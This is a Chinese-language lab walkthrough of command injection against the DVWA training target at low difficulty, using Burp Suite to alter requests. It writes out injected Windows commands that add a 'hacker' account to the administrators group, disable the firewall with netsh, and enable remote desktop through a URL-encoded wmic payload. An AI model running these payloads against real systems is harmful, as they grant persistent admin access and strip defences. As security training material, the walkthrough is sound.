DVWA靶场命令注入（CommandInjection）难度（low）

目录

1、输入IP地址之后&＃xff0c;靶机执行了一个Ping命令

2、burp拦截数据包发送到重发器

3、对数据包进行修改&＃xff0c;注入命令

作业准备&＃xff1a;

1、kali虚拟机

2、靶机&＃xff1a;Jdk环境、搭建DVWA靶场、phpStudy&＃xff08;Apache和MySQL都已配置&＃xff09;、BurpSuite抓包

3、虚拟主机

1、输入IP地址之后&＃xff0c;靶机执行了一个Ping命令

发现乱码

乱码解决方法&＃xff1a;

解决此问题的方法&＃xff1a;在DVWA-master\dvwa\includes目录下找到dvwaPage.inc.php文件中所有的”charset&＃61;utf-8”&＃xff0c;修改”charset&＃61;gb2312”&＃xff0c;即可

2、burp拦截数据包发送到重发器

3、对数据包进行修改&＃xff0c;注入命令

①查看目标用户&＃xff08;whoami&＃xff09;

②查看目标机器上的用户&＃xff08;net user&＃xff09;

 ③在目标机器上添加一个用户

 ④查看上一步是否成功添加用户 

⑤将添加的用户添加到管理员组,以hacker为例

net localgroup administrators hacker/add 

⑥关闭目标防火墙

 netsh firewall set opmode mode&＃61;disable

或者

netsh advfirewall set allprofiles state off

⑦开启windows远程桌面

ip&＃61;127.0.0.1%26wmic%20RDTOGGLE%20WHERE%20ServerName&＃61;%27%COMPUTERNAME%%27%20call%20SetAllowTSConnections%201&Submit&＃61;Submit

wmic RDTOGGLE WHERE ServerName&＃61;&＃39;%COMPUTERNAME%&＃39; call SetAllowTSConnections 1